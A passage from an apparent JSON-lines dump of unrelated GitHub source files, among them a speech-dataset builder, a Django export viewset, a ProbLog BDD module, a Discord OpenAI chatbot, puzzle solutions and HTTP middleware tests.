csv files\nSPEECH_OCEAN_PATH = \"/PATH_TO_DATA/INTERSPEECH/speechocean762/\"\nTRAIN_SCORE_PATH = SPEECH_OCEAN_PATH + \"train/all-info.json\"\nTRAIN_WAV_PATH = SPEECH_OCEAN_PATH + \"train/wav.scp\"\nTEST_SCORE_PATH = SPEECH_OCEAN_PATH + \"test/all-info.json\"\nTEST_WAV_PATH = SPEECH_OCEAN_PATH + \"test/wav.scp\"\nRSC_SCORES_DETAIL = SPEECH_OCEAN_PATH + \"resource/scores-detail.json\"\nRSC_SCORES = SPEECH_OCEAN_PATH + \"resource/scores.json\"\nRSC_TEXT_PHONE = SPEECH_OCEAN_PATH + \"resource/text-phone\"\nwith open(TRAIN_SCORE_PATH, \"r\") as f:\n train_scores = json.load(f)\nwith open(TEST_SCORE_PATH, \"r\") as f:\n test_scores = json.load(f)\nwith open(RSC_SCORES_DETAIL, \"r\") as f:\n detail_scores = json.load(f)\nwith open(RSC_SCORES, \"r\") as f:\n scores = json.load(f)\n\ntrain_wav_path = load_dataset(\"csv\", data_files=TRAIN_WAV_PATH, delimiter=\"\\t\", column_names=[\"id\", \"path\"], split=\"train\")\ntest_wav_path = load_dataset(\"csv\", data_files=TEST_WAV_PATH, delimiter=\"\\t\", column_names=[\"id\", \"path\"], split=\"train\")\ntrain_wav_dict = {}\nfor i in range(len(train_wav_path)):\n idx = str(train_wav_path[i][\"id\"])\n train_wav_dict[idx] = train_wav_path[i][\"path\"]\ntest_wav_dict = {}\nfor i in range(len(test_wav_path)):\n idx = str(test_wav_path[i][\"id\"])\n test_wav_dict[idx] = test_wav_path[i][\"path\"]\n\nocean_train = open(\"./speechocean_train.csv\", \"w\")\nocean_test = open(\"./speechocean_test.csv\", \"w\")\n\nprint(\n \"ID\",\n \"accuracy\",\n \"completeness\",\n \"fluency\",\n \"prosodic\",\n \"total\",\n \"w_total\",\n \"w_accuracy\",\n \"w_stress\",\n \"p_accuracy\",\n \"text\",\n \"phone\",\n \"canon\",\n \"real\",\n \"path\",\n \"mispronunciations\",\n sep=\"|\",\n file=ocean_train,\n)\nfor utt in train_scores:\n phones_list = []\n canon_list = []\n real_list = []\n idx = 0\n w_total_list = []\n w_accuracy_list = []\n w_stress_list = []\n p_accuracy_list = []\n mis_list = []\n\n for word in train_scores[utt][\"words\"]:\n w_total_list.append(word[\"total\"])\n w_accuracy_list.append(word[\"accuracy\"])\n w_stress_list.append(word[\"stress\"])\n\n for phone in word[\"phones-accuracy\"]:\n p_accuracy_list.append(phone)\n for phone in word[\"phones\"]:\n phones_list.append(phone)\n canon_list.append(phone)\n real_list.append(phone)\n for mis in word[\"mispronunciations\"]:\n mis_list.append(mis)\n phone_no_stress = re.sub(\"[0-9]\", \"\", canon_list[idx + mis[\"index\"]])\n assert phone_no_stress == mis[\"canonical-phone\"]\n real_list[idx + mis[\"index\"]] = mis[\"pronounced-phone\"]\n idx = len(real_list)\n\n utt_no_zero = re.sub(\"^0+\", \"\", utt)\n\n print(\n utt,\n train_scores[utt][\"accuracy\"],\n round(train_scores[utt][\"completeness\"]),\n train_scores[utt][\"fluency\"],\n train_scores[utt][\"prosodic\"],\n train_scores[utt][\"total\"],\n w_total_list,\n w_accuracy_list,\n w_stress_list,\n p_accuracy_list,\n train_scores[utt][\"text\"],\n phones_list,\n canon_list,\n real_list,\n train_wav_dict[utt_no_zero],\n mis_list,\n sep=\"|\",\n file=ocean_train,\n )\n\n\nprint(\n \"ID\",\n \"accuracy\",\n \"completeness\",\n \"fluency\",\n \"prosodic\",\n \"total\",\n \"w_total\",\n \"w_accuracy\",\n \"w_stress\",\n \"p_accuracy\",\n \"text\",\n \"phone\",\n \"canon\",\n \"real\",\n \"path\",\n \"mispronunciations\",\n sep=\"|\",\n file=ocean_test,\n)\nfor utt in test_scores:\n phones_list = []\n canon_list = []\n real_list = []\n idx = 0\n w_total_list = []\n w_accuracy_list = []\n w_stress_list = []\n p_accuracy_list = []\n mis_list = []\n\n for word in test_scores[utt][\"words\"]:\n w_total_list.append(word[\"total\"])\n w_accuracy_list.append(word[\"accuracy\"])\n w_stress_list.append(word[\"stress\"])\n\n for phone in word[\"phones-accuracy\"]:\n p_accuracy_list.append(phone)\n for phone in word[\"phones\"]:\n phones_list.append(phone)\n canon_list.append(phone)\n real_list.append(phone)\n for mis in word[\"mispronunciations\"]:\n mis_list.append(mis)\n phone_no_stress = re.sub(\"[0-9]\", \"\", canon_list[idx + mis[\"index\"]])\n assert phone_no_stress == mis[\"canonical-phone\"]\n real_list[idx + mis[\"index\"]] = mis[\"pronounced-phone\"]\n idx = len(real_list)\n\n utt_no_zero = re.sub(\"^0+\", \"\", utt)\n\n print(\n utt,\n test_scores[utt][\"accuracy\"],\n round(test_scores[utt][\"completeness\"]),\n test_scores[utt][\"fluency\"],\n test_scores[utt][\"prosodic\"],\n test_scores[utt][\"total\"],\n w_total_list,\n w_accuracy_list,\n w_stress_list,\n p_accuracy_list,\n test_scores[utt][\"text\"],\n phones_list,\n canon_list,\n real_list,\n test_wav_dict[utt_no_zero],\n mis_list,\n sep=\"|\",\n file=ocean_test,\n )\n\nocean_train.close()\nocean_test.close()\n\nprint(\"- Finished making datasets for TIMIT, L2-ARCTIC, and SPEECHOCEAN762.\")\n","repo_name":"rhss10/joint-apa-mdd-mtl","sub_path":"data/create_datasets.py","file_name":"create_datasets.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"11061467893","text":"import os\n\nfrom rest_framework.authentication import BasicAuthentication\nfrom rest_framework.settings import api_settings\nfrom rest_framework.viewsets import ReadOnlyModelViewSet\nfrom rest_framework.mixins import DestroyModelMixin\n\nfrom onadata.apps.viewer.models.export import Export\nfrom onadata.apps.api.permissions import ExportDjangoObjectPermission\nfrom onadata.libs.renderers import renderers\nfrom onadata.libs.serializers.export_serializer import ExportSerializer\nfrom onadata.libs.authentication import (\n DigestAuthentication,\n TempTokenAuthentication,\n TempTokenURLParameterAuthentication)\nfrom onadata.libs.utils.logger_tools import response_with_mimetype_and_name\nfrom onadata.libs import filters\n\n\nclass ExportViewSet(DestroyModelMixin, ReadOnlyModelViewSet):\n authentication_classes = (DigestAuthentication,\n TempTokenAuthentication,\n TempTokenURLParameterAuthentication,\n BasicAuthentication)\n queryset = Export.objects.all()\n renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES + [\n renderers.CSVRenderer,\n renderers.CSVZIPRenderer,\n renderers.KMLRenderer,\n renderers.OSMExportRenderer,\n renderers.SAVZIPRenderer,\n renderers.XLSRenderer,\n renderers.XLSXRenderer,\n renderers.ZipRenderer\n ]\n serializer_class = ExportSerializer\n filter_backends = (filters.ExportFilter,)\n permission_classes = [ExportDjangoObjectPermission]\n\n def retrieve(self, request, *args, **kwargs):\n export = self.get_object()\n filename, extension = os.path.splitext(export.filename)\n extension = extension[1:]\n\n return response_with_mimetype_and_name(\n Export.EXPORT_MIMES[extension],\n filename,\n extension=extension,\n file_path=export.filepath,\n show_date=False)\n","repo_name":"childhelpline/myhelpline","sub_path":"onadata/apps/api/viewsets/export_viewset.py","file_name":"export_viewset.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"12909349782","text":"input = open(0)\n\nt = 0\nc = 0\nx = 1\n\n\ndef yes():\n global t, c, x\n if c in {20, 60, 100, 140, 180, 220}:\n t += c * x\n\n\nfor line in input:\n cmd = line.split()\n\n if cmd[0] == \"noop\":\n c += 1\n yes()\n else:\n a = int(cmd[1])\n c += 1\n yes()\n c += 1\n yes()\n x += a\n\nprint(t)\n","repo_name":"nexxeln/aoc-2022","sub_path":"day-10/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"28009237076","text":"from .core import transform\nfrom .dd_formula import DD, build_dd, DDManager\nfrom .errors import InstallError\nfrom .formula import LogicDAG\n\n# noinspection PyBroadException\n# noinspection PyUnresolvedReferences\ntry:\n # noinspection PyPackageRequirements\n pass\nexcept Exception:\n bdd = None\n\nimport dd.autoref as bdd\n\n\nclass BDD(DD):\n \"\"\"A propositional logic formula consisting of and, or, not and atoms represented as an BDD.\"\"\"\n\n def __init__(self, **kwdargs):\n if bdd is None:\n raise InstallError(\"The BDD library is not available.\")\n\n DD.__init__(self, auto_compact=False, **kwdargs)\n\n def _create_manager(self):\n return BDDManager()\n\n def get_atom_from_inode(self, node):\n \"\"\"Get the original atom given an internal node.\n\n :param node: internal node\n :return: atom represented by the internal node\n \"\"\"\n return self.var2atom[self.get_manager().get_variable(node)]\n\n @classmethod\n def is_available(cls):\n \"\"\"Checks whether the BDD library is available.\"\"\"\n return bdd is not None\n\n\nclass BDDManager(DDManager):\n \"\"\"\n Manager for BDDs.\n It wraps around the pyeda BDD module\n \"\"\"\n\n # noinspection PyUnusedLocal\n def __init__(self, varcount=0, auto_gc=True):\n \"\"\"Create a new BDD manager.\n\n :param varcount: number of initial variables\n :type varcount: int\n :param auto_gc: use automatic garbage collection and minimization\n :type auto_gc: bool\n \"\"\"\n DDManager.__init__(self)\n self.varcount = 1\n self.base = bdd.BDD()\n self.ZERO = self.base.false\n self.ONE = self.base.true\n\n def add_variable(self, label=0):\n if label == 0 or label > self.varcount:\n self.varcount += 1\n res = self.varcount\n else:\n res = label\n self.base.declare(\"v\" + str(res))\n return res\n\n def get_variable(self, node):\n \"\"\"Get the variable represented by the given node.\n\n :param node: internal node\n :return: original node\n \"\"\"\n # noinspection PyProtectedMember\n return self.base.var(node)\n\n def literal(self, label):\n return self.base.var(\"v\" + str(self.add_variable(label)))\n\n def is_true(self, node):\n return node.is_one()\n\n def true(self):\n return self.ONE\n\n def is_false(self, node):\n return node.is_zero()\n\n def false(self):\n return self.ZERO\n\n def conjoin2(self, r, s):\n return r & s\n\n def disjoin2(self, r, s):\n return r | s\n\n def negate(self, node):\n return ~node\n\n def same(self, node1, node2):\n # Assumes BDD library always reuses equivalent nodes.\n return node1 is node2\n\n def ref(self, *nodes):\n pass\n\n def deref(self, *nodes):\n pass\n\n def write_to_dot(self, node, filename):\n with open(filename, \"w\") as f:\n print(node.to_dot(), file=f)\n\n def _parse_expr(self, expr):\n # EXPR := VAR | \"TRUE\" | \"FALSE\" | ITE\n # ITE := \"ite\" \"(\" VAR \",\" EXPR \",\" EXPR \")\"\n # VAR := expression\n lexpr = len(expr)\n if expr.startswith(\"TRUE\"):\n res = \"TRUE\"\n pos = 4\n elif expr.startswith(\"FALSE\"):\n res = \"FALSE\"\n pos = 5\n elif expr.startswith(\"ite(\"):\n pos = 4\n var, rst = expr[pos:].split(\", \", 1)\n ift, pos1 = self._parse_expr(rst)\n iff, pos2 = self._parse_expr(rst[pos1:])\n res = (var, ift, iff)\n pos += pos1 + pos2 + len(var)\n elif expr.startswith(\"(~ \"):\n pos = 3\n sub, pos1 = self._parse_expr(expr[pos:])\n pos = pos + pos1 + 1\n res = (\"~\", sub)\n else:\n pos = 0\n while pos < lexpr and expr[pos] not in \" ,)\":\n pos += 1\n res = expr[:pos]\n while pos < lexpr and expr[pos] in \" ,)\":\n pos += 1\n\n return res, pos\n\n def _enum_paths(self, expr, weights, semiring, negated=False):\n if expr == \"TRUE\":\n if not negated:\n yield semiring.one()\n elif expr == \"FALSE\":\n if negated:\n yield semiring.one()\n elif type(expr) == str:\n v = int(expr[1:])\n wp, wn = weights[abs(v)]\n if v > 0:\n pass\n else:\n wp, wn = wn, wp\n if negated:\n yield wn\n else:\n yield wp\n elif len(expr) == 3:\n v = int(expr[0][1:])\n wp, wn = weights[abs(v)]\n if v > 0:\n pass\n else:\n wp, wn = wn, wp\n\n for p in self._enum_paths(expr[1], weights, semiring, negated=negated):\n if negated:\n yield semiring.plus(wn, p)\n else:\n yield semiring.times(wp, p)\n for p in self._enum_paths(expr[2], weights, semiring, negated=negated):\n if negated:\n yield semiring.plus(wp, p)\n else:\n yield semiring.times(wn, p)\n else:\n if negated:\n pall = semiring.one()\n else:\n pall = semiring.zero()\n for p in self._enum_paths(expr[1], weights, semiring, negated=not negated):\n if negated:\n pall = semiring.times(pall, p)\n else:\n pall = semiring.plus(pall, p)\n yield pall\n\n def wmc(self, node, weights, semiring):\n pall = semiring.zero()\n\n expr, _ = self._parse_expr(node.to_expr())\n\n for prob in self._enum_paths(expr, weights, semiring):\n pall = semiring.plus(prob, pall)\n return pall\n\n def wmc_literal(self, node, weights, semiring, literal):\n raise NotImplementedError(\"not supported\")\n\n def wmc_true(self, weights, semiring):\n return semiring.one()\n\n def __del__(self):\n pass\n\n\n@transform(LogicDAG, BDD)\ndef build_bdd(source, destination, **kwdargs):\n \"\"\"Build an SDD from another formula.\n\n :param source: source formula\n :param destination: destination formula\n :param kwdargs: extra arguments\n :return: destination\n \"\"\"\n return build_dd(source, destination, **kwdargs)\n","repo_name":"ML-KULeuven/problog","sub_path":"problog/bdd_formula_alt.py","file_name":"bdd_formula_alt.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"83"} +{"seq_id":"18707537341","text":"# 36 = 2^2 * 3^3\n\n# 2^0 * 3^0 = 1\n# 2^0 * 3^1 = 3\n# 2^0 * 3^2 = 9\n# 2^1 * 3^0 = 2\n# 2^1 * 3^1 = 6\n# 2^1 * 3^2 = 18\n# 2^2 * 3^0 = 4\n# 2^2 * 3^1 = 12\n# 2^2 * 3^2 = 36\n\n# 1+3+9+2+6+18+4+12+36 = 91\n\n# (2^0 + 2^1 + 2^2) * (3^0 + 3^1 + 3^2)\n# = (1 + 2 + 4) * (1 + 3 + 9)\n# = 7 *13\n# = 91\n\nclass AdvancedArithmetic(object):\n def divisorSum(n):\n raise NotImplementedError\n\ndef factorization(n):\n arr = []\n temp = n\n for i in range(2, int(-(-n**0.5//1))+1):\n if temp%i==0:\n cnt=0\n while temp%i==0:\n cnt+=1\n temp //= i\n arr.append([i, cnt])\n\n if temp!=1:\n arr.append([temp, 1])\n\n return arr\n\nclass Calculator(AdvancedArithmetic):\n def divisorSum(self, n):\n factored = factorization(n)\n result = 1\n for i, count in factored:\n tmp = 0\n for j in range(count+1):\n tmp += i**j\n result *= tmp\n return result\n\nn = int(input())\nmy_calculator = Calculator()\ns = my_calculator.divisorSum(n)\nprint(\"I implemented: \" + type(my_calculator).__bases__[0].__name__)\nprint(s)\n","repo_name":"hiromichinomata/hackerrank","sub_path":"30_days_of_code/019_interfaces.py","file_name":"019_interfaces.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"27480552708","text":"\nimport pymongo\n\nclient = pymongo.MongoClient()\ndb = client.movie_x\nmovies = db.movies.find({})\nfor movie in movies:\n year = movie.get('year', 0)\n actors = db.actors.find({'name': {'$in': movie.get('major_actor_list')}})\n for actor in actors:\n if actor.get('year', -1) < year:\n db.actors.update_one({\n '_id': actor['_id']\n }, {\n '$set': {\n 'year': year\n }\n }, upsert=False)","repo_name":"474873060/movie_spider","sub_path":"movie_crawl/mytest.py","file_name":"mytest.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"2823439579","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 8 16:18:23 2018\n\n@author: Shamanth\n\"\"\"\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nbookDF=pd.read_csv('C:/Users/Shamanth/goodbooks-10k-master/books.csv')\nbookDF=bookDF.drop(['image_url','small_image_url','title','best_book_id','isbn','isbn13'],axis=1)\nratingsDF = pd.read_csv('C:/Users/Shamanth/goodbooks-10k-master/ratings.csv')\n\nlistOfDictonaries=[]\nindexMap = {}\nreverseIndexMap = {}\nptr=0;\ntestdf = ratingsDF\ntestdf=testdf[['user_id','rating']].groupby(testdf['book_id'])\nfor groupKey in testdf.groups.keys():\n tempDict={}\n\n groupDF = testdf.get_group(groupKey)\n for i in range(0,len(groupDF)):\n tempDict[groupDF.iloc[i,0]]=groupDF.iloc[i,1]\n indexMap[ptr]=groupKey\n reverseIndexMap[groupKey] = ptr\n ptr=ptr+1\n listOfDictonaries.append(tempDict)\n \nfrom sklearn.feature_extraction import DictVectorizer\ndictVectorizer = DictVectorizer(sparse=True)\nvector = dictVectorizer.fit_transform(listOfDictonaries)\n\nfrom sklearn.metrics.pairwise import cosine_similarity\npairwiseSimilarity = cosine_similarity(vector)\n\ndef printBookDetails(bookID):\n # print(\"Title:\", bookDF[bookDF['id']==bookID]['original_title'].values[0])\n #print(\"Author:\",bookDF[bookDF['userid']==bookID]['authors'].values[0])\n print(\"Printing Book-ID:\",bookID)\n print(\"=================++++++++++++++=========================\")\n\n\ndef getTopRecommandations(bookID):\n row = reverseIndexMap[bookID]\n print(\"------INPUT BOOK--------\")\n printBookDetails(bookID)\n print(\"-------RECOMMENDATIONS----------\")\n similarBookIDs = [printBookDetails(indexMap[i]) for i in np.argsort(pairwiseSimilarity[row])[-7:-2][::-1]]\n \nif __name__ == \"__main__\":\n getTopRecommandations(980)","repo_name":"ShamanthK/BookRecommendationSystem","sub_path":"Collaborative Filtering.py","file_name":"Collaborative Filtering.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"35985563370","text":"from django import forms\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.forms import ModelForm\nfrom django.forms.widgets import CheckboxSelectMultiple\nfrom clinic.models import Doctor, SelfCertificationQuestion\nimport os\n\nclass DoctorForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Doctor\n\t\tfields = ['name', 'credentials', 'languages', 'self_certification_questions']\n\t\twidgets = {\n\t\t\t'languages': CheckboxSelectMultiple(),\n\t\t\t'self_certification_questions': CheckboxSelectMultiple(),\n\t\t}\n\n\tdef clean_credentials(self):\n\t\tf = self.cleaned_data.get('credentials')\n\n\t\text = os.path.splitext(f.name)[-1].lower()\n\t\tif ext not in settings.ALLOWED_UPLOAD_EXTENSIONS:\n\t\t\traise ValidationError(\"This type of file is not allowed.\")\n\n\t\tif f.size > 20 * 1024 * 1024:\n\t\t\traise ValidationError(\"Proof of credentials must be less than 20MB.\")\n\n\t\treturn f\n\n\tdef clean_self_certification_questions(self):\n\t\tanswered = self.cleaned_data.get('self_certification_questions')\n\n\t\tunanswered_count = SelfCertificationQuestion.objects.exclude(id__in=answered.values_list('id', flat=True)).count()\n\t\tif unanswered_count > 0:\n\t\t\traise ValidationError(\"You must confirm all items.\")\n\n\t\treturn answered\n","repo_name":"tballantyne/medicam","sub_path":"clinic/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"6976530741","text":"import face_recognition\nimport cv2\n\n\n\nvideo_file_3min = \"Zypl_short.mp4\"\ncap = cv2.VideoCapture(video_file_3min)\ncounter =0 \n\nwhile True:\n _,frame=cap.read()\n frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)\n face = face_recognition.face_locations(frame)\n frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)\n\n for i in face:\n cv2.rectangle(frame,(i[3],i[0]),(i[1],i[2]),(255,0,255),2)\n\n\n cv2.imshow(\"frame\",frame)\n k=cv2.waitKey(1)\n if k%256==27:\n break\ncap.release()\ncv2.destroyAllWindows()\n# while True:\n# sucess,frame = cap.read();\n\n# frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)\n# face = face_recognition.face_locations(frame)\n \n \n# frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)\n \n \n# counter +=1\n# cv2.imshow(\"Test\",frame)\n# k = cv2.waitKey(1)\n# if k%256==27:\n# break\n# print(\"number of detections: {} \".format(counter))\n# cap.release()\n# cv2.destroyAllWindows()","repo_name":"jsUser15/Zypl","sub_path":"face_rec.py","file_name":"face_rec.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33438762833","text":"'''#1 find maximum and minimum of two numbers\r\n \r\na=5\r\nb=6\r\n\r\nif a>b:\r\n print(a,\"is maximum and\", b, \"is minimum\")\r\nelse:\r\n print(b,\"is maximum and\", a, \"is minimum\")\r\n\r\nprint(\"\\r\")\r\n#2 using max function\r\n\r\na=3\r\nb=5\r\n\r\nmaxm=max(a,b)\r\n\r\nprint(maxm)\r\nprint(\"\\r\")\r\n#3 creating a function\r\n\r\ndef maximum(a,b):\r\n if a>b :\r\n return a\r\n else:\r\n return b\r\n\r\na,b=8,9\r\n\r\nprint(maximum(a,b))\r\n'''\r\n#4 using lambda \r\n\r\na=4;b=8\r\n\r\nmaximum=lambda a,b: a if a>b else b\r\n\r\nprint(f'{maximum(a,b)} is maximum number')\r\n","repo_name":"Asmitazope/Python-Basic-Programs","sub_path":"max_min_Two_Num.py","file_name":"max_min_Two_Num.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"10186230513","text":"import functools\nfrom typing import List\n\n\nclass Solution:\n def minNumber(self, nums: List[int]) -> str:\n def compare(x, y):\n if x + y < y + x: return 0\n elif x + y > y + x: return 1\n else: return 0\n nums = [str(num) for num in nums]\n nums = sorted(nums, key=functools.cmp_to_key(compare))\n return ''.join(nums)\n\ntest = Solution()\nnums = [123,321]\nprint(test.minNumber(nums))","repo_name":"DeclK/2023-Autumn-Recruitment-Summary","sub_path":"leetcode-diary/Offer 45. 把数组排成最小的数.py","file_name":"Offer 45. 把数组排成最小的数.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"84"} +{"seq_id":"70065922836","text":"import platform\n\nfrom SCons.Errors import BuildError\n\nImport('env')\nif not 'pkg' in COMMAND_LINE_TARGETS:\n Return()\ndef unsupported(system):\n raise BuildError(errstr=\"Cannot build %s installer; platform package builder not yet implemented.\" % system)\n\nsupported = {\n 'deb':lambda :env.SConscript('deb/SConscript', 'env'), \n 'osx':lambda :env.SConscript('osx/SConscript', 'env'), \n 'msi':lambda :env.SConscript('win32/SConscript', 'env')\n}\n\nsystem = platform.system()\nif system == 'Linux':\n distro = platform.linux_distribution()[0]\n if distro.lower() in ('debian', 'ubuntu'):\n supported['deb']()\n else:\n unsupported(distro)\nelif system == 'Windows':\n unsupported(system) \nelif system == 'Darwin':\n unsupported(system)\nelse:\n unsupported(system)\n","repo_name":"ldrumm/libbeemo","sub_path":"pkg/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"35139601325","text":"#Author: BinaryBills\r\n#Creation Date: January 8, 2022\r\n#Date Modified: January 17, 2022\r\n#Purpose: This file handle using the OpenAI API to respond to users. It also handles\r\n#saving the memory of the AI to the SQL database, so it can engage in conversations\r\n#with users. \r\n\r\nimport openai\r\nimport random\r\nfrom discord import app_commands\r\nfrom discord.ext import commands\r\nfrom config import settings\r\nfrom config import sqlServer\r\nimport collections\r\n\r\nclass aiBot(commands.Cog):\r\n def __init__(self,client):\r\n self.client = client\r\n self.queue = collections.deque(maxlen=50000)\r\n \r\n @commands.Cog.listener()\r\n async def on_message(self,message):\r\n try:\r\n if message.author == self.client.user:\r\n return\r\n\r\n # Check if there is a previous conversation with this user\r\n sql = \"SELECT message FROM conversations WHERE user_id = %s ORDER BY created_at DESC LIMIT 1\"\r\n previous_convo = await sqlServer.mysqli_user_query(settings.conn, sql, (message.author.id,))\r\n prompt = message.content if not previous_convo else previous_convo[0][0]\r\n\r\n #Add current message to the database\r\n sql = \"INSERT INTO conversations (message) VALUES (%s)\"\r\n conversation_id = await sqlServer.mysqli_user_query(settings.conn, sql, (message.content,))\r\n\r\n #Add message so it can remember previous message\r\n self.queue.append(message.content)\r\n\r\n prompt = f\"Hey give me a response for this: {message.content}.\\n\"\r\n for i, msg in enumerate(self.queue):\r\n prompt += f\"Message {i}: {msg}\\n\"\r\n\r\n\r\n #Get the bot's response and add it to the database\r\n response = openai.Completion.create(\r\n model=\"text-davinci-003\",\r\n prompt=prompt,\r\n temperature=0.4,\r\n max_tokens=150,\r\n top_p=1.0,\r\n frequency_penalty=0.5,\r\n presence_penalty=0.0,\r\n stop=[\"You:\"]\r\n )\r\n\r\n #Send the response to the server\r\n bot_response = response.choices[0].text.strip()\r\n sql = \"UPDATE conversations SET response = %s WHERE id = %s\"\r\n await sqlServer.mysqli_user_query(settings.conn, sql, (bot_response, conversation_id))\r\n print(bot_response)\r\n\r\n #If the bot's response is empty, generate a new response or send a default message\r\n if not bot_response:\r\n # Option 1: Generate a new response with a different prompt\r\n new_prompt = f\"Can you tell me more about {random.choice(['your hobbies', 'your job', 'your family'])}?\\n\"\r\n response = openai.Completion.create(\r\n model=\"text-davinci-003\",\r\n prompt=new_prompt,\r\n temperature=0.4,\r\n max_tokens=150,\r\n top_p=1.0,\r\n frequency_penalty=0.5,\r\n presence_penalty=0.0,\r\n stop=[\"You:\"]\r\n )\r\n bot_response = response.choices[0].text.strip()\r\n\r\n # Send the bot's response to the channel\r\n if bot_response != \" \":\r\n await message.channel.send(bot_response)\r\n \r\n \r\n except Exception as e:\r\n print(f\"The error '{e}' occurred\")\r\n \r\n \r\nasync def setup(client):\r\n await client.add_cog(aiBot(client))","repo_name":"BinaryBills/AIChatBot","sub_path":"cogs/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7106282803","text":"from endpoints import home_endpoint\nfrom request import Request\nfrom middleware import logging_middleware_factory, headers_middleware_factory, csrf_middlware_factory\n# A HELPER TEST FUNCTION\n\ndef run_test(condition, name):\n if condition:\n print(f\"{name} - Pass\")\n else:\n print(f\"{name} - Fail\")\n\n# COMPOSING THE MIDDLEWARE CHAIN\n\nmiddleware_chain = csrf_middlware_factory(home_endpoint)\nmiddleware_chain = headers_middleware_factory(middleware_chain)\nmiddleware_chain = logging_middleware_factory(middleware_chain)\nprint(middleware_chain)\n\n# TESTS\n\nreq1 = Request(\n method=\"GET\",\n uri=\"/\",\n version=\"HTTP/1.1\",\n text=\"\",\n headers={\n \"Accept\": \"text/html\",\n \"X-CSRF-TOKEN\": \"qasdfoin234908asdfn\"\n }\n)\nprint(\"==== OUTPUT FROM MIDDLEWARE CHAIN APPEARS HERE ====\")\nresponse = middleware_chain(req1)\nprint(\"==================================================\")\n\n## TESTS FOR ENDPOINT FUNCTIONALITY\nrun_test(\n response.code == 200,\n \"Home endpoint base functionality status should be 200\"\n)\n\nrun_test(\n response.reason == \"Ok\",\n \"Home endpoint base functionality reason should be Ok\"\n)\n\nrun_test(\n response.headers[\"Content-Type\"] == \"text/html\",\n \"Home endpoint base functionality content type header should be text/html\"\n)\n\n## TESTS FOR HEADERS_MIDDLEWARE\nprint()\nrun_test(\n \"Content-Length\" in response.headers and response.headers[\"Content-Length\"] == 22,\n \"Home endpoint headers_middleware content length header should be 22\"\n)\n\nrun_test(\n \"Server\" in response.headers and response.headers[\"Server\"] == \"My Mock Server\",\n \"Home endpoint headers_middleware server header should be set\"\n)\n\nrun_test(\n \"Connection\" in response.headers and response.headers[\"Connection\"] == \"close\",\n \"Home endpoint headers_middleware connection header should be close\"\n)\n\n## TESTS FOR THE CSRF MIDDLEWARE\nprint()\nreq2 = Request(\n method=\"GET\",\n uri=\"/\",\n version=\"HTTP/1.1\",\n text=\"\",\n headers={\n \"Accept\": \"text/html\",\n ## notice that X-CSRF-Token is missing\n }\n)\n\nprint(\"==== OUTPUT FROM MIDDLEWARE CHAIN APPEARS HERE ====\")\nresponse = middleware_chain(req2)\nprint(\"==================================================\")\n\nrun_test(\n response.code == 401,\n \"Home endpoint csrf_middleware missing token should have status 401\"\n)\n\nrun_test(\n response.text == \"

Unauthorized

\",\n \"Home endpoint csrf_middleware text should display unauthorized\"\n)\n\nrun_test(\n \"Content-Length\" in response.headers and response.headers[\"Content-Length\"] == 21,\n \"Home endpoint csrf_middleware content length header should be 21\"\n)\n\nrun_test(\n \"Server\" in response.headers and response.headers[\"Server\"] == \"My Mock Server\",\n \"Home endpoint csrf_middleware server header should be set\"\n)\n\nrun_test(\n \"Connection\" in response.headers and response.headers[\"Connection\"] == \"close\",\n \"Home endpoint csrf_middleware connection header should be close\"\n)","repo_name":"dittonjs/CS2610Fa23ClassExamples","sub_path":"middleware/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41204655484","text":"import csv\nimport datetime\nfrom datetime import datetime as dt\n\nfrom rs_csv_processor.resources.constants import SrsDefaultValues\n\n\nclass SrsUtils:\n def __init__(self, input_dat_path: str):\n self.input_dat_path = input_dat_path\n self.raw_data = SrsUtils.read_dat_as_csv(input_dat_path)\n\n @staticmethod\n def read_dat_as_csv(input_dat_path: str) -> list[list]:\n with open(input_dat_path, 'r') as i_d:\n d_reader = csv.reader(i_d, delimiter=',', quotechar='|')\n rows = [row 